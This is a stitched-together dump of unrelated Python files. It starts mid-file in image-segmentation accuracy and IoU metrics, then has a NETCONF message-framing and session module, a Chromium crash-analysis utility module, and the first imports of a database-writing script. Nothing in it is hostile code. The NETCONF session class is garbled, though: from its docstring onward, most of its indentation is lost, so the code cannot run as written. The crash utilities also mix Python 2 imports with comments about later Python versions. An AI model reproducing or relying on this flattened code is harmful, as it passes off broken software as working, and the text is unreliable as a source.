    assert (area_inter <= area_union).all(), "Intersection area should be smaller than Union area"
    return area_inter, area_union
def pixelAccuracy(imPred, imLab):
    """
    This function takes the prediction and label of a single image, returns pixel-wise accuracy
    To compute over many images do:
    for i = range(Nimages):
        (pixel_accuracy[i], pixel_correct[i], pixel_labeled[i]) = \
            pixelAccuracy(imPred[i], imLab[i])
    mean_pixel_accuracy = 1.0 * np.sum(pixel_correct) / (np.spacing(1) + np.sum(pixel_labeled))
    """
    # Pixels with a negative label are "unlabeled" and excluded from both
    # the correct and labeled counts — we should not penalize detections in
    # unlabeled portions of the image.
    valid = imLab >= 0
    pixel_labeled = np.sum(valid)
    pixel_correct = np.sum((imPred == imLab) * valid)
    pixel_accuracy = 1.0 * pixel_correct / pixel_labeled
    return (pixel_accuracy, pixel_correct, pixel_labeled)
def intersectionAndUnion(imPred, imLab, numClass):
    """
    This function takes the prediction and label of a single image,
    returns intersection and union areas for each class
    To compute over many images do:
    for i in range(Nimages):
        (area_intersection[:,i], area_union[:,i]) = intersectionAndUnion(imPred[i], imLab[i])
    IoU = 1.0 * np.sum(area_intersection, axis=1) / np.sum(np.spacing(1)+area_union, axis=1)
    """
    # Zero out predictions on unlabeled pixels (label < 0) so they land
    # outside the histogram range and are never counted.
    masked_pred = imPred * (imLab >= 0)
    # Intersection: pixels where the (masked) prediction matches the label.
    inter_map = masked_pred * (masked_pred == imLab)
    area_intersection, _ = np.histogram(inter_map, bins=numClass, range=(1, numClass))
    area_pred, _ = np.histogram(masked_pred, bins=numClass, range=(1, numClass))
    area_lab, _ = np.histogram(imLab, bins=numClass, range=(1, numClass))
    area_union = area_pred + area_lab - area_intersection
    return (area_intersection, area_union)
def hist_info(pred, label, num_cls):
    """Return (confusion histogram, labeled pixel count, correct pixel count).

    Only pixels whose label lies in [0, num_cls) contribute; the histogram is
    a num_cls x num_cls matrix indexed as [true_label, predicted_label].
    """
    assert pred.shape == label.shape
    valid = (label >= 0) & (label < num_cls)
    labeled = np.sum(valid)
    correct = np.sum(pred[valid] == label[valid])
    # Encode each (label, pred) pair as a single bin index, then count.
    flat_index = num_cls * label[valid].astype(int) + pred[valid]
    hist = np.bincount(flat_index, minlength=num_cls ** 2).reshape(num_cls, num_cls)
    return hist, labeled, correct
def compute_score(hist, correct, labeled):
    """Derive IoU and accuracy summaries from a confusion histogram.

    Returns (per-class IoU, mean IoU, mean IoU without class 0,
    mean pixel accuracy).
    """
    diag = np.diag(hist)
    # union per class = row sum + column sum - diagonal
    iu = diag / (hist.sum(1) + hist.sum(0) - diag)
    mean_IU = np.nanmean(iu)
    # Class 0 is treated as background and excluded from the second mean.
    mean_IU_no_back = np.nanmean(iu[1:])
    freq = hist.sum(1) / hist.sum()
    freq_IU = (iu[freq > 0] * freq[freq > 0]).sum()
    mean_pixel_acc = correct / labeled
    return iu, mean_IU, mean_IU_no_back, mean_pixel_acc
|
base.py | # -*- coding: utf-8 eval: (yapf-mode 1) -*-
#
# February 19 2015, Christian Hopps <chopps@gmail.com>
#
# Copyright (c) 2015, Deutsche Telekom AG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes
import logging
import io
import socket
import sys
import threading
import traceback
from lxml import etree
from netconf import NSMAP, MAXSSHBUF
from netconf.error import ChannelClosed, FramingError, SessionError
import netconf.util as ncutil
logger = logging.getLogger(__name__)
# NETCONF base-protocol capability URNs (RFC 4741 / RFC 6241).
NC_BASE_10 = "urn:ietf:params:netconf:base:1.0"
NC_BASE_11 = "urn:ietf:params:netconf:base:1.1"
# Prepended to every outgoing NETCONF message.
XML_HEADER = """<?xml version="1.0" encoding="UTF-8"?>"""
if sys.version_info[0] >= 3:

    def lookahead(iterable):
        """Yield (element, is_last) pairs for *iterable*."""
        it = iter(iterable)
        prev = next(it)
        for item in it:
            yield prev, False
            prev = item
        yield prev, True
else:

    def lookahead(iterable):
        """Yield (element, is_last) pairs for *iterable* (Python 2)."""
        it = iter(iterable)
        prev = it.next()
        for item in it:
            yield prev, False
            prev = item
        yield prev, True
def chunkit(msg, maxsend, minsend=0, pad="\n"):
    """
    chunkit iterates over a msg returning chunks of at most maxsend
    size, and of at least minsend size if non-zero. Padding will be
    added if required. This function currently requires that maxsend
    is at least large enough to hold 2 minsend chunks.
    """
    # For now we'll make this assumption as it makes the
    # implementation much easier.
    assert maxsend >= 2 * minsend
    sz = len(msg)
    nchunks = sz // maxsend    # number of full maxsend-sized chunks
    lastmax = sz % maxsend     # size of the trailing partial chunk (if any)
    # Handle the special cases
    if sz == 0:
        # Nothing to send.
        return
    elif nchunks == 1 and lastmax == 0:
        # Exactly one full chunk.
        yield msg
        return
    elif nchunks == 0:
        # Single short chunk; pad it up to minsend if needed.
        # lastmax == 0 then sz == 0 handled above.
        assert lastmax != 0
        if lastmax < minsend:
            msg = msg + pad * (minsend - lastmax)
        yield msg
        return
    # Make sure our final chunk is at least minsend long: if the trailing
    # piece is too short, borrow bytes from the penultimate chunk instead
    # of padding.
    nchunks -= 1
    penultmax = maxsend
    if lastmax == 0:
        lastmax = maxsend
        nchunks -= 1
    elif lastmax < minsend:
        penultmax -= minsend - lastmax
        lastmax = minsend
    left = 0
    for unused in range(0, nchunks):
        yield msg[left:left + maxsend]
        left += maxsend
    # Penultimate (possibly shortened) chunk, then the final chunk.
    right = left + penultmax
    yield msg[left:right]
    yield msg[right:]
class NetconfTransportMixin(object):
    """Abstract interface for connection-oriented transports."""

    def connect(self):
        # Subclasses must establish the underlying connection.
        raise NotImplementedError()

    def close(self):
        # Subclasses must tear the connection down.
        raise NotImplementedError()
class NetconfPacketTransport(object):
    """Abstract interface for transports that exchange whole NETCONF PDUs."""

    def send_pdu(self, msg, new_framing):
        # new_framing selects 1.1 chunked framing over 1.0 EOM framing.
        raise NotImplementedError()

    def receive_pdu(self, new_framing):
        raise NotImplementedError()
class NetconfFramingTransport(NetconfPacketTransport):
    """Packetize an ssh stream into netconf PDUs -- doesn't need to be SSH specific"""

    def __init__(self, stream, max_chunk, debug):
        # XXX we have 2 channels defined one here and one in the connect/accept class
        self.stream = stream
        self.max_chunk = max_chunk    # max bytes per single read/write
        self.debug = debug
        self.rbuffer = b""            # buffer of received, not-yet-parsed bytes

    def __del__(self):
        self.close()

    def close(self):
        # Idempotent: only the first call actually closes the stream.
        stream = self.stream
        if stream is not None:
            self.stream = None
            if self.debug:
                logger.debug("Closing netconf socket stream %s", str(stream))
            stream.close()

    def is_active(self):
        # Some stream objects expose is_active() directly; others (e.g.
        # paramiko-style channels) only expose it on their transport.
        try:
            self.stream.is_active
        except AttributeError:
            transport = self.stream.get_transport()
            if not transport:
                return False
            return transport.is_active()
        else:
            return self.stream.is_active()

    def receive_pdu(self, new_framing):
        """Receive one message; new_framing selects 1.1 chunked framing."""
        assert self.stream is not None
        if new_framing:
            return self._receive_11()
        else:
            return self._receive_10()

    def send_pdu(self, msg, new_framing):
        """Frame and send one message."""
        assert self.stream is not None
        if new_framing:
            # 1.1 framing: "\n#<len>\n" header, payload, "\n##\n" trailer.
            bmsg = msg.encode('utf-8')
            blen = len(bmsg)
            msg = "\n#{}\n".format(blen).encode('utf-8') + bmsg + "\n##\n".encode('utf-8')
        else:
            # 1.0 framing: append the end-of-message marker.
            msg += "]]>]]>"
        # Apparently ssh has a bug that requires minimum of 64 bytes?
        for chunk in chunkit(msg, self.max_chunk, 64):
            self.stream.sendall(chunk)

    def _receive_10(self):
        # Read until the 1.0 end-of-message marker "]]>]]>" is found.
        searchfrom = 0
        while True:
            eomidx = self.rbuffer.find(b"]]>]]>", searchfrom)
            if eomidx != -1:
                break
            # The marker may straddle two reads: re-scan the last 5 bytes.
            searchfrom = max(0, len(self.rbuffer) - 5)
            buf = self.stream.recv(self.max_chunk)
            self.rbuffer += buf
        msg = self.rbuffer[:eomidx]
        self.rbuffer = self.rbuffer[eomidx + 6:]    # drop the 6-byte marker
        return msg.decode('utf-8')

    def _receive_chunk(self):
        # Read one 1.1 chunk; return its payload bytes, or None when the
        # end-of-chunks marker ("\n##\n") is seen.
        blen = len(self.rbuffer)
        while blen < 4:
            # Need at least 4 bytes for the smallest possible header.
            buf = self.stream.recv(self.max_chunk)
            self.rbuffer += buf
            blen = len(self.rbuffer)
            if self.stream is None:
                if self.debug:
                    logger.debug("Channel closed: stream is None")
                raise ChannelClosed(self)
            if not buf:
                if self.debug:
                    logger.debug("Channel closed: Zero bytes read")
                raise ChannelClosed(self)
        # Every chunk header begins with "\n#".
        if self.rbuffer[:2] != b"\n#":
            raise FramingError(self.rbuffer)
        self.rbuffer = self.rbuffer[2:]
        # Get chunk length or termination indicator
        idx = -1
        searchfrom = 0
        while True:
            idx = self.rbuffer.find(b"\n", searchfrom)
            if 12 > idx > 0:
                break
            # An over-long length field (no LF within 12 bytes) is bogus.
            if idx > 12 or len(self.rbuffer) > 12:
                raise FramingError(self.rbuffer)
            searchfrom = len(self.rbuffer)
            self.rbuffer += self.stream.recv(self.max_chunk)
        # Check for last chunk.
        if self.rbuffer[0:2] == b"#\n":
            self.rbuffer = self.rbuffer[2:]
            return None
        lenstr = self.rbuffer[:idx]
        self.rbuffer = bytes(self.rbuffer[idx + 1:])
        try:
            chunklen = int(lenstr)
            # RFC 6242 limits chunk-size to 1..4294967295.
            if not (4294967295 >= chunklen > 0):
                raise FramingError("Unacceptable chunk length: {}".format(chunklen))
        except ValueError:
            raise FramingError("Frame length not integer: {}".format(lenstr.encode('utf-8')))
        # Keep reading until the whole chunk payload is buffered.
        while True:
            blen = len(self.rbuffer)
            if blen >= chunklen:
                chunk = self.rbuffer[:chunklen]
                self.rbuffer = self.rbuffer[chunklen:]
                return chunk
            self.rbuffer += self.stream.recv(self.max_chunk)

    def _iter_receive_chunks(self):
        # Yield chunk payloads until the end-of-chunks marker (None).
        assert self.stream is not None
        chunk = self._receive_chunk()
        while chunk:
            yield chunk
            chunk = self._receive_chunk()

    def _receive_11(self):
        # A 1.1 message is the concatenation of all of its chunks.
        assert self.stream is not None
        data = b"".join([x for x in self._iter_receive_chunks()])
        return data.decode('utf-8')
class NetconfSession(object):
"""Netconf Protocol Server and Client"""
    # This class is almost identical to sshutil.SSHServerSession. We need to
    # figure out a way to factor out the commonality. One issue is that this
    # class can be used with any transport, not just SSH, so where should it go?
    def __init__(self, stream, debug, session_id, max_chunk=MAXSSHBUF):
        """
        :param stream: underlying byte stream; wrapped in a framing transport.
        :param debug: enable verbose debug logging.
        :param session_id: NETCONF session-id for this session.
        :param max_chunk: maximum transport read/write size.
        """
        self.debug = debug
        self.pkt_stream = NetconfFramingTransport(stream, max_chunk, debug)
        # Start with 1.0 end-of-message framing; upgraded after <hello>
        # capability exchange negotiates base:1.1.
        self.new_framing = False
        self.capabilities = set()
        self.reader_thread = None
        self.lock = threading.Lock()    # guards pkt_stream and session state
        self.session_id = session_id
        self.session_open = False
def __del__(self):
if hasattr(self, "session_open") and self.session_open:
self.close()
def is_active(self):
with self.lock:
return self.pkt_stream and self.pkt_stream.is_active()
def __str__(self):
return "NetconfSession(sid:{})".format(self.session_id)
def send_message(self, msg):
with self.lock:
pkt_stream = self.pkt_stream
if not pkt_stream:
logger.debug("Dropping message b/c no stream (%d): %s", len(msg), msg)
if self.debug:
logger.debug("Sending message (%d): %s", len(msg), msg)
pkt_stream.send_pdu(XML_HEADER + msg, self.new_framing)
def _receive_message(self):
# private method to receive a full message.
with self.lock:
if self.reader_thread and not self.reader_thread.keep_running:
return None
pkt_stream = self.pkt_stream
return pkt_stream.receive_pdu(self.new_framing)
def send_hello(self, caplist, session_id=None):
msg = ncutil.elm("hello", attrib={'xmlns': NSMAP['nc']})
caps = ncutil.elm("capabilities")
for cap in caplist:
ncutil.subelm(caps, "capability").text = str(cap)
if session_id is not None:
assert hasattr(self, "methods")
self.methods.nc_append_capabilities(caps) # pylint: disable=E1101
msg.append(caps)
if self.debug:
logger.debug("%s: Sending HELLO", str(self))
if session_id is not None:
msg.append(ncutil.leaf_elm("session-id", str(session_id)))
msg = etree.tostring(msg)
self.send_message(msg.decode('utf-8'))
def close(self):
if self.debug:
logger.debug("%s: Closing.", str(self))
with self.lock:
if self.session_open:
self.session_open = False
self.session_id = None
if self.reader_thread:
self.reader_thread.keep_running = False
if self.pkt_stream is not None:
if self.debug:
logger.debug("%s: Closing transport.", str(self))
pkt_stream = self.pkt_stream
self.pkt_stream = None
if pkt_stream:
# If we are blocked on reading this should unblock us
pkt_stream.close()
def _open_session(self, is_server):
assert is_server or self.session_id is None
# The transport should be connected at this point.
try:
# Send hello message.
self.send_hello((NC_BASE_10, NC_BASE_11), self.session_id)
# Get reply
reply = self._receive_message()
if self.debug:
logger.debug("Received HELLO")
# Parse reply
tree = etree.parse(io.BytesIO(reply.encode('utf-8')))
root = tree.getroot()
caps = root.xpath("//nc:hello/nc:capabilities/nc:capability", namespaces=NSMAP)
# Store capabilities
for cap in caps:
self.capabilities.add(cap.text)
if NC_BASE_11 in self.capabilities:
self.new_framing = True
elif NC_BASE_10 not in self.capabilities:
raise SessionError("Server doesn't implement 1.0 or 1.1 of netconf")
# Get session ID.
try:
session_id = root.xpath("//nc:hello/nc:session-id", namespaces=NSMAP)[0].text
# If we are a server it is a failure to receive a session id.
if is_server:
raise SessionError("Client sent a session-id")
self.session_id = int(session_id)
except (KeyError, IndexError, AttributeError):
if not is_server:
raise SessionError("Server didn't supply session-id")
except ValueError:
raise SessionError("Server supplied non integer session-id: {}".format(session_id))
self.session_open = True
# Create reader thread.
self.reader_thread = threading.Thread(target=self._read_message_thread)
self.reader_thread.daemon = True
self.reader_thread.keep_running = True
self.reader_thread.start()
if self.debug:
logger.debug("%s: Opened version %s session.", str(self), "1.1"
if self.new_framing else "1.0")
except Exception:
self.close()
raise
def reader_exits(self):
# Called from reader thread when our reader thread exits
raise NotImplementedError("reader_exits")
def reader_handle_message(self, msg):
# Called from reader thread after receiving a framed message
raise NotImplementedError("read_handle_message")
def _read_message_thread(self):
# XXX the locking and dealing with the exit of this thread needs improvement
if self.debug:
logger.debug("Starting reader thread.")
reader_thread = self.reader_thread
try:
while self.pkt_stream:
with self.lock:
pkt_stream = self.pkt_stream
if not reader_thread.keep_running:
break
assert pkt_stream is not None
msg = self._receive_message()
if msg:
self.reader_handle_message(msg)
closed = False
else:
# Client closed, never really see this 1/2 open case unfortunately.
if self.debug:
logger.debug("Client remote closed, exiting reader thread.")
closed = True
with self.lock:
if closed:
reader_thread.keep_running = False
if not reader_thread.keep_running:
break
if self.debug:
logger.debug("Exiting reader thread")
except AttributeError as error:
# Should we close the session cleanly or just disconnect?
if "'NoneType' object has no attribute 'recv'" in str(error):
logger.error("%s: Session channel cleared (open: %s): %s: %s", str(self),
str(self.session_open), str(error), traceback.format_exc())
else:
logger.error(
"Unexpected exception in reader thread [disconnecting+exiting]: %s: %s",
str(error), traceback.format_exc())
self.close()
except ChannelClosed as error:
# Should we close the session cleanly or just disconnect?
# if self.debug:
# logger.debug("%s: Session channel closed [session_open == %s]: %s: %s",
# str(self),
# str(self.session_open),
# str(error),
# traceback.format_exc())
# else:
logger.debug("%s: Session channel closed [session_open == %s]: %s", str(self),
str(self.session_open), str(error))
try:
self.close()
except Exception as error:
logger.debug("%s: Exception while closing during ChannelClosed: %s", str(self),
str(error))
except SessionError as error:
# Should we close the session cleanly or just disconnect?
logger.error("%s Session error [closing session]: %s", str(self), str(error))
self.close()
except socket.error as error:
if self.debug:
logger.debug("Socket error in reader thread [exiting]: %s", str(error))
self.close()
except Exception as error:
with self.lock:
keep_running = reader_thread.keep_running
if keep_running:
logger.error(
"Unexpected exception in reader thread [disconnecting+exiting]: %s: %s",
str(error), traceback.format_exc())
self.close()
else:
# XXX might want to catch errors due to disconnect and not re-raise
logger.debug("Exception in reader thread [exiting]: %s: %s", str(error),
traceback.format_exc())
finally:
# If we are exiting the read thread we close the session.
self.reader_exits()
__author__ = 'Christian Hopps'
__date__ = 'December 23 2014'
__version__ = '1.0'
__docformat__ = "restructuredtext en"
|
crash_utils.py | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import cgi
import ConfigParser
import json
import os
import Queue
import threading
import time
from common import utils
from result import Result
INFINITY = float('inf')
MAX_THREAD_NUMBER = 10
TASK_QUEUE = None
def SignalWorkerThreads():
  """Ask every worker thread to exit by queueing one None sentinel apiece."""
  global TASK_QUEUE
  if not TASK_QUEUE:
    return
  for _ in range(MAX_THREAD_NUMBER):
    TASK_QUEUE.put(None)
  # Give worker threads a chance to exit.
  # Workaround the harmless bug in python 2.7 below.
  time.sleep(1)

atexit.register(SignalWorkerThreads)
def Worker():
  """Worker-thread loop: run tasks from TASK_QUEUE until a None sentinel."""
  global TASK_QUEUE
  while True:
    try:
      task = TASK_QUEUE.get()
      if not task:
        return
    except TypeError:
      # According to http://bugs.python.org/issue14623, this is a harmless bug
      # in python 2.7 which won't be fixed.
      # The exception is raised on daemon threads when python interpreter is
      # shutting down.
      return

    function, args, kwargs, result_semaphore = task
    try:
      function(*args, **kwargs)
    except Exception:
      # BUG FIX: this was a bare `except:`, which also swallowed SystemExit
      # and KeyboardInterrupt. Task failures are still deliberately ignored.
      pass
    finally:
      # Signal one task is done in case of exception.
      result_semaphore.release()
def RunTasks(tasks):
  """Run given tasks. Not thread-safe: no concurrent calls of this function.

  Return after all tasks were completed. A task is a dict as below:
    {
      'function': the function to call,
      'args': the positional argument to pass to the function,
      'kwargs': the key-value arguments to pass to the function,
    }
  """
  if not tasks:
    return
  global TASK_QUEUE
  # Lazily create the queue and the worker pool on first use; the daemon
  # worker threads then live for the rest of the process.
  if not TASK_QUEUE:
    TASK_QUEUE = Queue.Queue()
    for index in range(MAX_THREAD_NUMBER):
      thread = threading.Thread(target=Worker, name='worker_%s' % index)
      # Set as daemon, so no join is needed.
      thread.daemon = True
      thread.start()
  # Each task releases this once when it finishes (even on failure), so
  # acquiring len(tasks) times below blocks until every task is done.
  result_semaphore = threading.Semaphore(0)
  # Push task to task queue for execution.
  for task in tasks:
    TASK_QUEUE.put(
        (task['function'], task.get('args', []),
         task.get('kwargs', {}), result_semaphore))
  # Wait until all tasks to be executed.
  for _ in tasks:
    result_semaphore.acquire()
def GetRepositoryType(revision_number):
  """Returns the repository type of this revision number.

  Args:
    revision_number: A revision number or git hash.

  Returns:
    'git' or 'svn', depending on the revision_number.
  """
  return 'git' if utils.IsGitHash(revision_number) else 'svn'
def ParseURLsFromConfig(file_name):
  """Parses URLS from the config file.

  The file should be in python config format, where svn section is in the
  format "svn:component_path".
  Each of the section for svn should contain changelog_url, revision_url,
  diff_url and blame_url.

  Args:
    file_name: The name of the file that contains URL information.

  Returns:
    A dictionary that maps repository type to list of URLs. For svn, it maps
    key 'svn' to another dictionary, which maps component path to the URLs
    as explained above. For git, it maps to the URLs as explained above.
    Returns None if the config file cannot be read.
  """
  config = ConfigParser.ConfigParser()

  # Get the absolute path of the config file, and read the file. If it fails,
  # return none.
  config_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                                  file_name)
  # BUG FIX: ConfigParser instances are always truthy, so the original
  # `if not config` test could never detect a failed read. config.read()
  # returns the list of files it successfully parsed; an empty list means
  # the config file could not be read.
  if not config.read(config_file_path):
    return None

  # Iterate through the config file, check for sections.
  config_dict = {}
  for section in config.sections():
    # These two do not need another layer of dictionary, so add it and go
    # to next section.
    if ':' not in section:
      for option in config.options(section):
        if section not in config_dict:
          config_dict[section] = {}
        url = config.get(section, option)
        config_dict[section][option] = url
      continue

    # Get repository type and component name from the section name.
    repository_type_and_component = section.split(':')
    repository_type = repository_type_and_component[0]
    component_path = repository_type_and_component[1]

    # Add 'svn' as the key, if it is not already there.
    if repository_type not in config_dict:
      config_dict[repository_type] = {}
    url_map_for_repository = config_dict[repository_type]

    # Add the path to the 'svn', if it is not already there.
    if component_path not in url_map_for_repository:
      url_map_for_repository[component_path] = {}
    type_to_url = url_map_for_repository[component_path]

    # Add all URLs to this map.
    for option in config.options(section):
      url = config.get(section, option)
      type_to_url[option] = url
  return config_dict
def NormalizePath(path, parsed_deps):
  """Normalizes the path.

  Args:
    path: A string representing a path.
    parsed_deps: A map from component path to its component name, repository,
      etc.

  Returns:
    A tuple containing a component this path is in (e.g blink, skia, etc)
    and a path in that component's repository. Returns None if the component
    repository is not supported, i.e from googlecode.
  """
  # First normalize the path by retrieving the normalized path.
  normalized_path = os.path.normpath(path).replace('\\', '/')
  # Iterate through all component paths in the parsed DEPS, in the decreasing
  # order of the length of the file path, so the most specific (longest)
  # component path wins.
  for component_path in sorted(parsed_deps,
                               key=(lambda path: -len(path))):
    # new_component_path is the component path with 'src/' removed.
    new_component_path = component_path
    if new_component_path.startswith('src/') and new_component_path != 'src/':
      new_component_path = new_component_path[len('src/'):]
    # We need to consider when the lowercased component path is in the path,
    # because syzyasan build returns lowercased file path.
    lower_component_path = new_component_path.lower()
    # If this path is the part of file path, this file must be from this
    # component.
    if new_component_path in normalized_path or \
        lower_component_path in normalized_path:
      # Case when the retrieved path is in lowercase.
      if lower_component_path in normalized_path:
        current_component_path = lower_component_path
      else:
        current_component_path = new_component_path
      # Normalize the path by stripping everything off the component's relative
      # path.
      normalized_path = normalized_path.split(current_component_path, 1)[1]
      lower_normalized_path = normalized_path.lower()
      # Add 'src/' or 'Source/' at the front of the normalized path, depending
      # on what prefix the component path uses. For example, blink uses
      # 'Source' but chromium uses 'src/', and blink component path is
      # 'src/third_party/WebKit/Source', so add 'Source/' in front of the
      # normalized path.
      if (lower_component_path == 'src/third_party/webkit/source' and
          not lower_normalized_path.startswith('source/')):
        normalized_path = (current_component_path.split('/')[-2] + '/' +
                           normalized_path)
      component_name = parsed_deps[component_path]['name']
      return (component_path, component_name, normalized_path)
  # If the path does not match any component, default to chromium.
  return ('src/', 'chromium', normalized_path)
def SplitRange(regression):
  """Splits a range as retrieved from clusterfuzz.

  Args:
    regression: A string in format 'r1234:r5678'.

  Returns:
    A list containing two numbers represented in string, for example
    ['1234','5678']. None when regression info is missing or malformed.
  """
  if not regression:
    return None
  parts = regression.split(':')
  # If regression information is not available, return none.
  if len(parts) != 2:
    return None
  # Strip the leading 'r' if present. Slicing (rather than lstrip) avoids
  # eating leading characters of a git hash that happens to start with 'r'.
  return [part[1:] if part.startswith('r') else part for part in parts]
def LoadJSON(json_string):
  """Loads json object from string, or None.

  Args:
    json_string: A string to get object from.

  Returns:
    JSON object if the string represents a JSON object, None otherwise.
  """
  try:
    return json.loads(json_string)
  except ValueError:
    # Malformed JSON is treated as "no data".
    return None
def GetDataFromURL(url):
  """Retrieves raw data from URL, tries 10 times.

  Args:
    url: URL to get data from.

  Returns:
    None if the data retrieval fails, or the raw data.
  """
  status_code, data = utils.GetHttpClient().Get(url, retries=10)
  if status_code != 200:
    # Return None if it fails to read data.
    return None
  return data
def FindMinLineDistance(crashed_line_list, changed_line_numbers,
                        line_range=3):
  """Calculates how far the changed line is from one of the crashes.

  Finds the minimum distance between the lines that the file crashed on
  and the lines that the file changed. For example, if the file crashed on
  line 200 and the CL changes line 203,204 and 205, the function returns 3.

  Args:
    crashed_line_list: A list of iterables of lines that the file crashed on.
    changed_line_numbers: A list of lines that the file changed.
    line_range: Number of lines to look back for.

  Returns:
    A tuple (min_distance, crashed_line, changed_line). When either input
    is empty no distance exists, so (inf, -1, -1) is returned.
  """
  min_distance = float('inf')
  min_crashed_line = -1
  min_changed_line = -1

  # Expand each crashed line to include |line_range| lines before it.
  crashed_line_numbers = set()
  for crashed_line_range in crashed_line_list:
    for crashed_line in crashed_line_range:
      for line in range(crashed_line - line_range, crashed_line + 1):
        crashed_line_numbers.add(line)

  for line in crashed_line_numbers:
    for changed_line in changed_line_numbers:
      # Find the current distance and update the min if current distance is
      # less than current min.
      current_distance = abs(line - changed_line)
      if current_distance < min_distance:
        min_distance = current_distance
        min_crashed_line = line
        min_changed_line = changed_line

  # BUG FIX: the original reused `crashed_line` as both a loop variable and
  # the result variable, so when no distance was ever computed (e.g. empty
  # changed_line_numbers) it leaked the last crashed line instead of -1.
  return (min_distance, min_crashed_line, min_changed_line)
def GuessIfSameSubPath(path1, path2):
  """Guesses if two paths represent same path.

  Compares the name of the folders in the path (by split('/')), and checks
  if they match either more than 3 or min of path lengths.

  Args:
    path1: First path.
    path2: Second path to compare.

  Returns:
    True if it they are thought to be a same path, False otherwise.
  """
  segments1 = path1.split('/')
  segments2 = path2.split('/')
  shared = set(segments1) & set(segments2)
  # The shorter path caps the threshold, with an upper bound of 3 segments.
  threshold = min(3, len(segments1), len(segments2))
  return len(shared) >= threshold
def FindMinStackFrameNumber(stack_frame_indices, priorities):
  """Finds the minimum stack number, from the list of stack numbers.

  Args:
    stack_frame_indices: A list of lists containing stack position.
    priorities: A list of of priority for each file.

  Returns:
    Inf if stack_frame_indices is empty, minimum stack number otherwise.
  """
  # Only files tied for the best (numerically smallest) priority count.
  highest_priority = min(priorities)
  # Gather the stack frame numbers of those highest-priority files.
  flattened = []
  for index, priority in enumerate(priorities):
    if priority == highest_priority:
      flattened.extend(stack_frame_indices[index])
  # If no stack frame information is available, return inf. Else, return min.
  if not flattened:
    return INFINITY
  return min(flattened)
def _EscapeHtml(text, quote=False):
  """HTML-escapes &, <, > (and " when |quote|), like the removed cgi.escape."""
  escaped = text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
  if quote:
    escaped = escaped.replace('"', '&quot;')
  return escaped


def AddHyperlink(text, link):
  """Returns a string with HTML link tag.

  Args:
    text: A string to add link.
    link: A link to add to the string.

  Returns:
    A string with hyperlink added.
  """
  # BUG FIX: cgi.escape was deprecated and then removed from Python
  # (cgi.escape in 3.8, the cgi module in 3.13); _EscapeHtml reproduces its
  # exact escaping behavior without the dependency.
  sanitized_link = _EscapeHtml(link, quote=True)
  sanitized_text = _EscapeHtml(str(text))
  return '<a href="%s">%s</a>' % (sanitized_link, sanitized_text)
def PrettifyList(items):
  """Returns a string representation of a list.

  It adds comma in between the elements and removes the brackets.

  Args:
    items: A list to prettify.

  Returns:
    A string representation of the list.
  """
  return ', '.join(str(item) for item in items)
def PrettifyFrameInfo(frame_indices, functions):
  """Return a string to represent the frames with functions."""
  # Drop the argument list from each function signature, keeping the name.
  descriptions = [
      'frame #%s, "%s"' % (frame_index, function.split('(')[0])
      for frame_index, function in zip(frame_indices, functions)
  ]
  return '; '.join(descriptions)
def PrettifyFiles(file_list):
  """Returns a string representation of a list of file names.

  Args:
    file_list: A list of tuple, (file_name, file_url).

  Returns:
    A string representation of file names with their urls.
  """
  pieces = ['\n']
  pieces.extend(' %s\n' % AddHyperlink(file_name, file_url)
                for file_name, file_url in file_list)
  return ''.join(pieces)
def Intersection(crashed_line_list, stack_frame_index, changed_line_numbers,
                 function, line_range=3):
  """Finds the overlap between changed lines and crashed lines.

  Finds the intersection of the lines that caused the crash and
  lines that the file changes. The intersection looks within 3 lines
  of the line that caused the crash.

  Args:
    crashed_line_list: A list of lines that the file crashed on.
    stack_frame_index: A list of positions in stack for each of the lines.
    changed_line_numbers: A list of lines that the file changed.
    function: A list of functions that the file crashed on.
    line_range: Number of lines to look backwards from crashed lines.

  Returns:
    line_number_intersection: Intersection between crashed_line_list and
      changed_line_numbers.
    stack_frame_index_intersection: Stack number for each of the intersections.
  """
  line_number_intersection = []
  stack_frame_index_intersection = []
  function_intersection = []
  # Iterate through the crashed lines, and its occurence in stack.
  # NOTE(review): the loop variable below deliberately shadows the
  # `stack_frame_index` parameter; it works, but is fragile.
  for (lines, stack_frame_index, function_name) in zip(
      crashed_line_list, stack_frame_index, function):
    # Also check previous 'line_range' lines. Create a set of all changed lines
    # and lines within 3 lines range before the crashed line.
    line_minus_n = set()
    for line in lines:
      for line_in_range in range(line - line_range, line + 1):
        line_minus_n.add(line_in_range)
    for changed_line in changed_line_numbers:
      # If a CL does not change crashed line, check next line.
      if changed_line not in line_minus_n:
        continue
      intersected_line = set()
      # If the changed line is exactly the crashed line, add that line.
      for line in lines:
        if line in changed_line_numbers:
          intersected_line.add(line)
        # If the changed line is in 3 lines of the crashed line, add the line.
        else:
          intersected_line.add(changed_line)
      # Avoid adding the same line twice.
      if intersected_line not in line_number_intersection:
        line_number_intersection.append(list(intersected_line))
        stack_frame_index_intersection.append(stack_frame_index)
        function_intersection.append(function_name)
      # Only the first intersecting changed line is recorded per frame.
      break
  return (line_number_intersection, stack_frame_index_intersection,
          function_intersection)
def MatchListToResultList(matches):
  """Convert list of matches to the list of result objects.

  Args:
    matches: A list of match objects along with its stack priority and revision
      number/git hash

  Returns:
    A list of result object.
  """
  result_list = []
  for _, cl, match in matches:
    # For matches, line content do not exist.
    result_list.append(
        Result(cl, match.revision_url, match.component_name, match.author,
               match.reason.strip(), match.review_url, match.reviewers, None,
               match.message, match.time))
  return result_list
def BlameListToResultList(blame_list):
  """Convert blame list to the list of result objects.

  Args:
    blame_list: A list of blame objects.

  Returns:
    A list of result objects.
  """
  result_list = []
  for blame in blame_list:
    reason = (
        'The CL last changed line %s of file %s, which is stack frame %d.' %
        (blame.line_number, blame.file, blame.stack_frame_index))
    # Blame object does not have review url and reviewers.
    result_list.append(
        Result(blame.revision, blame.url, blame.component_name, blame.author,
               reason, None, None, blame.line_content, blame.message,
               blame.time))
  return result_list
|
write_db.py | import json
import threading
import loguru
import mysql.connector
import websocket
